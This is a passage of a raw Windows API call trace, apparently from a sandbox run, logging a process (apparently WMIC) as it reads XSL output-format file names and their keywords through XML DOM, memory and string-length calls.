[0295.710] SysStringLen (param_1="LIST") returned 0x4 [0295.710] SysStringLen (param_1="TABLE") returned 0x5 [0295.710] malloc (_Size=0x18) returned 0x3912a20 [0295.710] IUnknown:Release (This=0x34b6b88) returned 0x0 [0295.710] IUnknown:Release (This=0x34b9fa8) returned 0x0 [0295.710] IUnknown:Release (This=0x34b9ff8) returned 0x0 [0295.710] IXMLDOMNodeList:get_item (in: This=0x34b9ca0, index=3, listItem=0x323f7b0 | out: listItem=0x323f7b0*=0x34b6b88) returned 0x0 [0295.710] IXMLDOMNode:get_text (in: This=0x34b6b88, text=0x323f7b4 | out: text=0x323f7b4*="rawxml.xsl") returned 0x0 [0295.710] IXMLDOMNode:get_attributes (in: This=0x34b6b88, attributeMap=0x323f7ac | out: attributeMap=0x323f7ac*=0x34b9fa8) returned 0x0 [0295.711] malloc (_Size=0xc) returned 0x39198c8 [0295.711] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x34b9fa8, name="KEYWORD", namedItem=0x323f7a8 | out: namedItem=0x323f7a8*=0x34b9ff8) returned 0x0 [0295.711] free (_Block=0x39198c8) [0295.711] IXMLDOMNode:get_nodeValue (in: This=0x34b9ff8, value=0x323f768 | out: value=0x323f768*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x0)) returned 0x0 [0295.711] malloc (_Size=0xc) returned 0x3919928 [0295.711] malloc (_Size=0xc) returned 0x3919820 [0295.711] SysStringLen (param_1="RAWXML") returned 0x6 [0295.711] SysStringLen (param_1="TABLE") returned 0x5 [0295.711] SysStringLen (param_1="RAWXML") returned 0x6 [0295.711] SysStringLen (param_1="LIST") returned 0x4 [0295.711] SysStringLen (param_1="LIST") returned 0x4 [0295.711] SysStringLen (param_1="RAWXML") returned 0x6 [0295.711] malloc (_Size=0x18) returned 0x39129c0 [0295.711] IUnknown:Release (This=0x34b6b88) returned 0x0 [0295.711] IUnknown:Release (This=0x34b9fa8) returned 0x0 [0295.711] IUnknown:Release (This=0x34b9ff8) returned 0x0 [0295.712] IXMLDOMNodeList:get_item (in: This=0x34b9ca0, index=4, listItem=0x323f7b0 | out: listItem=0x323f7b0*=0x34b6b88) returned 0x0 [0295.712] IXMLDOMNode:get_text (in: This=0x34b6b88, text=0x323f7b4 | out: text=0x323f7b4*="htable.xsl") returned 0x0 [0295.712] IXMLDOMNode:get_attributes (in: This=0x34b6b88, attributeMap=0x323f7ac | out: attributeMap=0x323f7ac*=0x34b9fa8) returned 0x0 [0295.712] malloc (_Size=0xc) returned 0x39199a0 [0295.712] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x34b9fa8, name="KEYWORD", namedItem=0x323f7a8 | out: namedItem=0x323f7a8*=0x34b9ff8) returned 0x0 [0295.712] free (_Block=0x39199a0) [0295.712] IXMLDOMNode:get_nodeValue (in: This=0x34b9ff8, value=0x323f768 | out: value=0x323f768*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x0)) returned 0x0 [0295.712] malloc (_Size=0xc) returned 0x39199a0 [0295.712] malloc (_Size=0xc) returned 0x3919958 [0295.712] SysStringLen (param_1="HTABLE") returned 0x6 [0295.712] SysStringLen (param_1="TABLE") returned 0x5 [0295.712] SysStringLen (param_1="HTABLE") returned 0x6 [0295.712] SysStringLen (param_1="LIST") returned 0x4 [0295.712] malloc (_Size=0x18) returned 0x39129a0 [0295.713] IUnknown:Release (This=0x34b6b88) returned 0x0 [0295.713] IUnknown:Release (This=0x34b9fa8) returned 0x0 [0295.713] IUnknown:Release (This=0x34b9ff8) returned 0x0 [0295.713] IXMLDOMNodeList:get_item (in: This=0x34b9ca0, index=5, listItem=0x323f7b0 | out: listItem=0x323f7b0*=0x34b6b88) returned 0x0 [0295.713] IXMLDOMNode:get_text (in: This=0x34b6b88, text=0x323f7b4 | out: text=0x323f7b4*="hform.xsl") returned 0x0 [0295.713] IXMLDOMNode:get_attributes (in: This=0x34b6b88, attributeMap=0x323f7ac | out: attributeMap=0x323f7ac*=0x34b9fa8) returned 0x0 [0295.713] malloc (_Size=0xc) returned 0x3919808 [0295.714] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x34b9fa8, name="KEYWORD", namedItem=0x323f7a8 | out: namedItem=0x323f7a8*=0x34b9ff8) returned 0x0 [0295.714] free (_Block=0x3919808) [0295.714] IXMLDOMNode:get_nodeValue (in: This=0x34b9ff8, value=0x323f768 | out: value=0x323f768*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x0)) returned 0x0 [0295.714] malloc (_Size=0xc) returned 0x3919808 [0295.714] malloc (_Size=0xc) returned 0x3919838 [0295.715] SysStringLen (param_1="HFORM") returned 0x5 [0295.715] SysStringLen (param_1="TABLE") returned 0x5 [0295.715] SysStringLen (param_1="HFORM") returned 0x5 [0295.715] SysStringLen (param_1="LIST") returned 0x4 [0295.715] SysStringLen (param_1="HFORM") returned 0x5 [0295.715] SysStringLen (param_1="HTABLE") returned 0x6 [0295.715] malloc (_Size=0x18) returned 0x3912c20 [0295.715] IUnknown:Release (This=0x34b6b88) returned 0x0 [0295.715] IUnknown:Release (This=0x34b9fa8) returned 0x0 [0295.715] IUnknown:Release (This=0x34b9ff8) returned 0x0 [0295.715] IXMLDOMNodeList:get_item (in: This=0x34b9ca0, index=6, listItem=0x323f7b0 | out: listItem=0x323f7b0*=0x34b6b88) returned 0x0 [0295.715] IXMLDOMNode:get_text (in: This=0x34b6b88, text=0x323f7b4 | out: text=0x323f7b4*="xml.xsl") returned 0x0 [0295.715] IXMLDOMNode:get_attributes (in: This=0x34b6b88, attributeMap=0x323f7ac | out: attributeMap=0x323f7ac*=0x34b9fa8) returned 0x0 [0295.715] malloc (_Size=0xc) returned 0x3919850 [0295.715] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x34b9fa8, name="KEYWORD", namedItem=0x323f7a8 | out: namedItem=0x323f7a8*=0x34b9ff8) returned 0x0 [0295.716] free (_Block=0x3919850) [0295.716] IXMLDOMNode:get_nodeValue (in: This=0x34b9ff8, value=0x323f768 | out: value=0x323f768*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x0)) returned 0x0 [0295.716] malloc (_Size=0xc) returned 0x3919850 [0295.716] malloc (_Size=0xc) returned 0x3919940 [0295.716] SysStringLen (param_1="XML") returned 0x3 [0295.716] SysStringLen (param_1="TABLE") returned 0x5 [0295.716] SysStringLen (param_1="XML") returned 0x3 [0295.716] SysStringLen (param_1="VALUE") returned 0x5 [0295.716] SysStringLen (param_1="VALUE") returned 0x5 [0295.716] SysStringLen (param_1="XML") returned 0x3 [0295.716] malloc (_Size=0x18) returned 0x3912ae0 [0295.716] IUnknown:Release (This=0x34b6b88) returned 0x0 [0295.716] IUnknown:Release (This=0x34b9fa8) returned 0x0 [0295.716] IUnknown:Release (This=0x34b9ff8) returned 0x0 [0295.716] IXMLDOMNodeList:get_item (in: This=0x34b9ca0, index=7, listItem=0x323f7b0 | out: listItem=0x323f7b0*=0x34b6b88) returned 0x0 [0295.717] IXMLDOMNode:get_text (in: This=0x34b6b88, text=0x323f7b4 | out: text=0x323f7b4*="mof.xsl") returned 0x0 [0295.717] IXMLDOMNode:get_attributes (in: This=0x34b6b88, attributeMap=0x323f7ac | out: attributeMap=0x323f7ac*=0x34b9fa8) returned 0x0 [0295.717] malloc (_Size=0xc) returned 0x3919868 [0295.717] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x34b9fa8, name="KEYWORD", namedItem=0x323f7a8 | out: namedItem=0x323f7a8*=0x34b9ff8) returned 0x0 [0295.717] free (_Block=0x3919868) [0295.717] IXMLDOMNode:get_nodeValue (in: This=0x34b9ff8, value=0x323f768 | out: value=0x323f768*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x0)) returned 0x0 [0295.717] malloc (_Size=0xc) returned 0x3919970 [0295.717] malloc (_Size=0xc) returned 0x3919868 [0295.717] SysStringLen (param_1="MOF") returned 0x3 [0295.717] SysStringLen (param_1="TABLE") returned 0x5 [0295.717] SysStringLen (param_1="MOF") returned 0x3 [0295.717] SysStringLen (param_1="LIST") returned 0x4 [0295.717] SysStringLen (param_1="MOF") returned 0x3 [0295.717] SysStringLen (param_1="RAWXML") returned 0x6 [0295.717] SysStringLen (param_1="LIST") returned 0x4 [0295.717] SysStringLen (param_1="MOF") returned 0x3 [0295.717] malloc (_Size=0x18) returned 0x3912a60 [0295.718] IUnknown:Release (This=0x34b6b88) returned 0x0 [0295.718] IUnknown:Release (This=0x34b9fa8) returned 0x0 [0295.718] IUnknown:Release (This=0x34b9ff8) returned 0x0 [0295.718] IXMLDOMNodeList:get_item (in: This=0x34b9ca0, index=8, listItem=0x323f7b0 | out: listItem=0x323f7b0*=0x34b6b88) returned 0x0 [0295.718] IXMLDOMNode:get_text (in: This=0x34b6b88, text=0x323f7b4 | out: text=0x323f7b4*="csv.xsl") returned 0x0 [0295.718] IXMLDOMNode:get_attributes (in: This=0x34b6b88, attributeMap=0x323f7ac | out: attributeMap=0x323f7ac*=0x34b9fa8) returned 0x0 [0295.718] malloc (_Size=0xc) returned 0x3919988 [0295.718] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x34b9fa8, name="KEYWORD", namedItem=0x323f7a8 | out: namedItem=0x323f7a8*=0x34b9ff8) returned 0x0 [0295.718] free (_Block=0x3919988) [0295.718] IXMLDOMNode:get_nodeValue (in: This=0x34b9ff8, value=0x323f768 | out: value=0x323f768*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x0)) returned 0x0 [0295.718] malloc (_Size=0xc) returned 0x3919880 [0295.719] malloc (_Size=0xc) returned 0x39198c8 [0295.719] SysStringLen (param_1="CSV") returned 0x3 [0295.719] SysStringLen (param_1="TABLE") returned 0x5 [0295.719] SysStringLen (param_1="CSV") returned 0x3 [0295.719] SysStringLen (param_1="LIST") returned 0x4 [0295.719] SysStringLen (param_1="CSV") returned 0x3 [0295.719] SysStringLen (param_1="HTABLE") returned 0x6 [0295.719] SysStringLen (param_1="CSV") returned 0x3 [0295.719] SysStringLen (param_1="HFORM") returned 0x5 [0295.719] malloc (_Size=0x18) returned 0x3912d40 [0295.719] IUnknown:Release (This=0x34b6b88) returned 0x0 [0295.719] IUnknown:Release (This=0x34b9fa8) returned 0x0 [0295.719] IUnknown:Release (This=0x34b9ff8) returned 0x0 [0295.719] IXMLDOMNodeList:get_item (in: This=0x34b9ca0, index=9, listItem=0x323f7b0 | out: listItem=0x323f7b0*=0x34b6b88) returned 0x0 [0295.719] IXMLDOMNode:get_text (in: This=0x34b6b88, text=0x323f7b4 | out: text=0x323f7b4*="texttable.xsl") returned 0x0 [0295.719] IXMLDOMNode:get_attributes (in: This=0x34b6b88, attributeMap=0x323f7ac | out: attributeMap=0x323f7ac*=0x34b9fa8) returned 0x0 [0295.720] malloc (_Size=0xc) returned 0x3919988 [0295.720] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x34b9fa8, name="KEYWORD", namedItem=0x323f7a8 | out: namedItem=0x323f7a8*=0x34b9ff8) returned 0x0 [0295.720] free (_Block=0x3919988) [0295.720] IXMLDOMNode:get_nodeValue (in: This=0x34b9ff8, value=0x323f768 | out: value=0x323f768*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0 [0295.720] malloc (_Size=0xc) returned 0x3919988 [0295.720] malloc (_Size=0xc) returned 0x391ae28 [0295.720] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0295.720] SysStringLen (param_1="TABLE") returned 0x5 [0295.720] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0295.720] SysStringLen (param_1="VALUE") returned 0x5 [0295.720] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0295.720] SysStringLen (param_1="XML") returned 0x3 [0295.720] SysStringLen (param_1="XML") returned 0x3 [0295.720] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0295.720] malloc (_Size=0x18) returned 0x3912a80 [0295.721] IUnknown:Release (This=0x34b6b88) returned 0x0 [0295.721] IUnknown:Release (This=0x34b9fa8) returned 0x0 [0295.721] IUnknown:Release (This=0x34b9ff8) returned 0x0 [0295.721] IXMLDOMNodeList:get_item (in: This=0x34b9ca0, index=10, listItem=0x323f7b0 | out: listItem=0x323f7b0*=0x34b6b88) returned 0x0 [0295.721] IXMLDOMNode:get_text (in: This=0x34b6b88, text=0x323f7b4 | out: text=0x323f7b4*="texttable.xsl") returned 0x0 [0295.721] IXMLDOMNode:get_attributes (in: This=0x34b6b88, attributeMap=0x323f7ac | out: attributeMap=0x323f7ac*=0x34b9fa8) returned 0x0 [0295.721] malloc (_Size=0xc) returned 0x391ae70 [0295.721] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x34b9fa8, name="KEYWORD", namedItem=0x323f7a8 | out: namedItem=0x323f7a8*=0x34b9ff8) returned 0x0 [0295.721] free (_Block=0x391ae70) [0295.721] IXMLDOMNode:get_nodeValue (in: This=0x34b9ff8, value=0x323f768 | out: value=0x323f768*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x0)) returned 0x0 [0295.721] malloc (_Size=0xc) returned 0x391ae88 [0295.722] malloc (_Size=0xc) returned 0x391ae40 [0295.722] SysStringLen (param_1="texttablewsys") returned 0xd [0295.722] SysStringLen (param_1="TABLE") returned 0x5 [0295.722] SysStringLen (param_1="texttablewsys") returned 0xd [0295.722] SysStringLen (param_1="XML") returned 0x3 [0295.722] SysStringLen (param_1="texttablewsys") returned 0xd [0295.722] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0295.722] SysStringLen (param_1="XML") returned 0x3 [0295.722] SysStringLen (param_1="texttablewsys") returned 0xd [0295.722] malloc (_Size=0x18) returned 0x3912d20 [0295.722] IUnknown:Release (This=0x34b6b88) returned 0x0 [0295.722] IUnknown:Release (This=0x34b9fa8) returned 0x0 [0295.722] IUnknown:Release (This=0x34b9ff8) returned 0x0 [0295.722] IXMLDOMNodeList:get_item (in: This=0x34b9ca0, index=11, listItem=0x323f7b0 | out: listItem=0x323f7b0*=0x34b6b88) returned 0x0 [0295.722] IXMLDOMNode:get_text (in: This=0x34b6b88, text=0x323f7b4 | out: text=0x323f7b4*="texttable.xsl") returned 0x0 [0295.722] IXMLDOMNode:get_attributes (in: This=0x34b6b88, attributeMap=0x323f7ac | out: attributeMap=0x323f7ac*=0x34b9fa8) returned 0x0 [0295.723] malloc (_Size=0xc) returned 0x391ae58 [0295.723] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x34b9fa8, name="KEYWORD", namedItem=0x323f7a8 | out: namedItem=0x323f7a8*=0x34b9ff8) returned 0x0 [0295.723] free (_Block=0x391ae58) [0295.723] IXMLDOMNode:get_nodeValue (in: This=0x34b9ff8, value=0x323f768 | out: value=0x323f768*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0 [0295.723] malloc (_Size=0xc) returned 0x391aed0 [0295.723] malloc (_Size=0xc) returned 0x391aea0 [0295.723] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0295.723] SysStringLen (param_1="TABLE") returned 0x5 [0295.723] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0295.723] SysStringLen (param_1="XML") returned 0x3 [0295.723] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0295.723] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0295.723] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0295.723] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0295.723] malloc (_Size=0x18) returned 0x3912d60 [0295.724] IUnknown:Release (This=0x34b6b88) returned 0x0 [0295.724] IUnknown:Release (This=0x34b9fa8) returned 0x0 [0295.724] IUnknown:Release (This=0x34b9ff8) returned 0x0 [0295.724] IXMLDOMNodeList:get_item (in: This=0x34b9ca0, index=12, listItem=0x323f7b0 | out: listItem=0x323f7b0*=0x34b6b88) returned 0x0 [0295.724] IXMLDOMNode:get_text (in: This=0x34b6b88, text=0x323f7b4 | out: text=0x323f7b4*="texttable.xsl") returned 0x0 [0295.724] IXMLDOMNode:get_attributes (in: This=0x34b6b88, attributeMap=0x323f7ac | out: attributeMap=0x323f7ac*=0x34b9fa8) returned 0x0 [0295.724] malloc (_Size=0xc) returned 0x391ae10 [0295.724] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x34b9fa8, name="KEYWORD", namedItem=0x323f7a8 | out: namedItem=0x323f7a8*=0x34b9ff8) returned 0x0 [0295.724] free (_Block=0x391ae10) [0295.725] IXMLDOMNode:get_nodeValue (in: This=0x34b9ff8, value=0x323f768 | out: value=0x323f768*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0 [0295.725] malloc (_Size=0xc) returned 0x391aeb8 [0295.725] malloc (_Size=0xc) returned 0x391ae58 [0295.725] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0295.725] SysStringLen (param_1="TABLE") returned 0x5 [0295.725] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0295.725] SysStringLen (param_1="XML") returned 0x3 [0295.725] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0295.725] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0295.725] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0295.725] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0295.725] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0295.725] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0295.725] malloc (_Size=0x18) returned 0x3912ca0 [0295.725] IUnknown:Release (This=0x34b6b88) returned 0x0 [0295.725] IUnknown:Release (This=0x34b9fa8) returned 0x0 [0295.725] IUnknown:Release (This=0x34b9ff8) returned 0x0 [0295.725] IXMLDOMNodeList:get_item (in: This=0x34b9ca0, index=13, listItem=0x323f7b0 | out: listItem=0x323f7b0*=0x34b6b88) returned 0x0 [0295.726] IXMLDOMNode:get_text (in: This=0x34b6b88, text=0x323f7b4 | out: text=0x323f7b4*="texttable.xsl") returned 0x0 [0295.726] IXMLDOMNode:get_attributes (in: This=0x34b6b88, attributeMap=0x323f7ac | out: attributeMap=0x323f7ac*=0x34b9fa8) returned 0x0 [0295.726] malloc (_Size=0xc) returned 0x391ae70 [0295.726] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x34b9fa8, name="KEYWORD", namedItem=0x323f7a8 | out: namedItem=0x323f7a8*=0x34b9ff8) returned 0x0 [0295.726] free (_Block=0x391ae70) [0295.726] IXMLDOMNode:get_nodeValue (in: This=0x34b9ff8, value=0x323f768 | out: value=0x323f768*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0 [0295.727] malloc (_Size=0xc) returned 0x391ae10 [0295.727] malloc (_Size=0xc) returned 0x391ae70 [0295.727] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0295.727] SysStringLen (param_1="TABLE") returned 0x5 [0295.727] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0295.727] SysStringLen (param_1="XML") returned 0x3 [0295.727] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0295.727] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0295.727] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0295.727] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0295.727] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0295.727] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0295.727] malloc (_Size=0x18) returned 0x39129e0 [0295.727] IUnknown:Release (This=0x34b6b88) returned 0x0 [0295.727] IUnknown:Release (This=0x34b9fa8) returned 0x0 [0295.727] IUnknown:Release (This=0x34b9ff8) returned 0x0 [0295.727] IXMLDOMNodeList:get_item (in: This=0x34b9ca0, index=14, listItem=0x323f7b0 | out: listItem=0x323f7b0*=0x34b6b88) returned 0x0 [0295.728] IXMLDOMNode:get_text (in: This=0x34b6b88, text=0x323f7b4 | out: text=0x323f7b4*="texttable.xsl") returned 0x0 [0295.728] IXMLDOMNode:get_attributes (in: This=0x34b6b88, attributeMap=0x323f7ac | out: attributeMap=0x323f7ac*=0x34b9fa8) returned 0x0 [0295.728] malloc (_Size=0xc) returned 0x391ad20 [0295.728] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x34b9fa8, name="KEYWORD", namedItem=0x323f7a8 | out: namedItem=0x323f7a8*=0x34b9ff8) returned 0x0 [0295.728] free (_Block=0x391ad20) [0295.728] IXMLDOMNode:get_nodeValue (in: This=0x34b9ff8, value=0x323f768 | out: value=0x323f768*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0 [0295.728] malloc (_Size=0xc) returned 0x391ac18 [0295.728] malloc (_Size=0xc) returned 0x391ade0 [0295.728] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0295.728] SysStringLen (param_1="TABLE") returned 0x5 [0295.728] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0295.728] SysStringLen (param_1="XML") returned 0x3 [0295.728] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0295.728] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0295.728] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0295.729] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0295.729] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0295.729] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0295.729] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0295.729] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0295.729] malloc (_Size=0x18) returned 0x3912b00 [0295.729] IUnknown:Release (This=0x34b6b88) returned 0x0 [0295.729] IUnknown:Release (This=0x34b9fa8) returned 0x0 [0295.729] IUnknown:Release (This=0x34b9ff8) returned 0x0 [0295.730] IXMLDOMNodeList:get_item (in: This=0x34b9ca0, index=15, listItem=0x323f7b0 | out: listItem=0x323f7b0*=0x34b6b88) returned 0x0 [0295.730] IXMLDOMNode:get_text (in: This=0x34b6b88, text=0x323f7b4 | out: text=0x323f7b4*="htable.xsl") returned 0x0 [0295.730] IXMLDOMNode:get_attributes (in: This=0x34b6b88, attributeMap=0x323f7ac | out: attributeMap=0x323f7ac*=0x34b9fa8) returned 0x0 [0295.730] malloc (_Size=0xc) returned 0x391acf0 [0295.730] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x34b9fa8, name="KEYWORD", namedItem=0x323f7a8 | out: namedItem=0x323f7a8*=0x34b9ff8) returned 0x0 [0295.730] free (_Block=0x391acf0) [0295.731] IXMLDOMNode:get_nodeValue (in: This=0x34b9ff8, value=0x323f768 | out: value=0x323f768*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0 [0295.731] malloc (_Size=0xc) returned 0x391ad98 [0295.731] malloc (_Size=0xc) returned 0x391adf8 [0295.731] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0295.731] SysStringLen (param_1="TABLE") returned 0x5 [0295.731] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0295.731] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0295.731] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0295.731] SysStringLen (param_1="XML") returned 0x3 [0295.731] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0295.731] SysStringLen (param_1="texttablewsys") returned 0xd [0295.731] SysStringLen (param_1="XML") returned 0x3 [0295.731] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0295.731] malloc (_Size=0x18) returned 0x3912b20 [0295.731] IUnknown:Release (This=0x34b6b88) returned 0x0 [0295.731] IUnknown:Release (This=0x34b9fa8) returned 0x0 [0295.731] IUnknown:Release (This=0x34b9ff8) returned 0x0 [0295.731] IXMLDOMNodeList:get_item (in: This=0x34b9ca0, index=16, listItem=0x323f7b0 | out: listItem=0x323f7b0*=0x34b6b88) returned 0x0 [0295.732] IXMLDOMNode:get_text (in: This=0x34b6b88, text=0x323f7b4 | out: text=0x323f7b4*="htable.xsl") returned 0x0 [0295.732] IXMLDOMNode:get_attributes (in: This=0x34b6b88, attributeMap=0x323f7ac | out: attributeMap=0x323f7ac*=0x34b9fa8) returned 0x0 [0295.732] malloc (_Size=0xc) returned 0x391ac00 [0295.732] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x34b9fa8, name="KEYWORD", namedItem=0x323f7a8 | out: namedItem=0x323f7a8*=0x34b9ff8) returned 0x0 [0295.732] free (_Block=0x391ac00) [0295.732] IXMLDOMNode:get_nodeValue (in: This=0x34b9ff8, value=0x323f768 | out: value=0x323f768*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x0)) returned 0x0 [0295.732] malloc (_Size=0xc) returned 0x391ab10 [0295.732] malloc (_Size=0xc) returned 0x391ab28 [0295.732] SysStringLen (param_1="htable-sortby") returned 0xd [0295.732] SysStringLen (param_1="TABLE") returned 0x5 [0295.732] SysStringLen (param_1="htable-sortby") returned 0xd [0295.732] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0295.732] SysStringLen (param_1="htable-sortby") returned 0xd [0295.733] SysStringLen (param_1="XML") returned 0x3 [0295.733] SysStringLen (param_1="htable-sortby") returned 0xd [0295.733] SysStringLen (param_1="texttablewsys") returned 0xd [0295.733] SysStringLen (param_1="htable-sortby") returned 0xd [0295.733] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0295.733] SysStringLen (param_1="XML") returned 0x3 [0295.733] SysStringLen (param_1="htable-sortby") returned 0xd [0295.733] malloc (_Size=0x18) returned 0x3912bc0 [0295.733] IUnknown:Release (This=0x34b6b88) returned 0x0 [0295.733] IUnknown:Release (This=0x34b9fa8) returned 0x0 [0295.733] IUnknown:Release (This=0x34b9ff8) returned 0x0 [0295.733] IXMLDOMNodeList:get_item (in: This=0x34b9ca0, index=17, listItem=0x323f7b0 | out: listItem=0x323f7b0*=0x34b6b88) returned 0x0 [0295.733] IXMLDOMNode:get_text (in: This=0x34b6b88, text=0x323f7b4 | out: text=0x323f7b4*="mof.xsl") returned 0x0 [0295.733] IXMLDOMNode:get_attributes (in: This=0x34b6b88, attributeMap=0x323f7ac | out: attributeMap=0x323f7ac*=0x34b9fa8) returned 0x0 [0295.733] malloc (_Size=0xc) returned 0x391acf0 [0295.733] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x34b9fa8, name="KEYWORD", namedItem=0x323f7a8 | out: namedItem=0x323f7a8*=0x34b9ff8) returned 0x0 [0295.734] free (_Block=0x391acf0) [0295.734] IXMLDOMNode:get_nodeValue (in: This=0x34b9ff8, value=0x323f768 | out: value=0x323f768*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0 [0295.734] malloc (_Size=0xc) returned 0x391ad20 [0295.734] malloc (_Size=0xc) returned 0x391ad38 [0295.734] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0295.734] SysStringLen (param_1="TABLE") returned 0x5 [0295.734] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0295.734] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0295.734] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0295.734] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0295.734] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0295.734] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0295.734] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0295.734] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0295.734] malloc (_Size=0x18) returned 0x3912b40 [0295.734] IUnknown:Release (This=0x34b6b88) returned 0x0 [0295.734] IUnknown:Release (This=0x34b9fa8) returned 0x0 [0295.735] IUnknown:Release (This=0x34b9ff8) returned 0x0 [0295.735] IXMLDOMNodeList:get_item (in: This=0x34b9ca0, index=18, listItem=0x323f7b0 | out: listItem=0x323f7b0*=0x34b6b88) returned 0x0 [0295.735] IXMLDOMNode:get_text (in: This=0x34b6b88, text=0x323f7b4 | out: text=0x323f7b4*="mof.xsl") returned 0x0 [0295.735] IXMLDOMNode:get_attributes (in: This=0x34b6b88, attributeMap=0x323f7ac | out: attributeMap=0x323f7ac*=0x34b9fa8) returned 0x0 [0295.735] malloc (_Size=0xc) returned 0x391ab40 [0295.735] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x34b9fa8, name="KEYWORD", namedItem=0x323f7a8 | out: namedItem=0x323f7a8*=0x34b9ff8) returned 0x0 [0295.735] free (_Block=0x391ab40) [0295.735] IXMLDOMNode:get_nodeValue (in: This=0x34b9ff8, value=0x323f768 | out: value=0x323f768*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0 [0295.735] malloc (_Size=0xc) returned 0x391aba0 [0295.735] malloc (_Size=0xc) returned 0x391ab40 [0295.736] 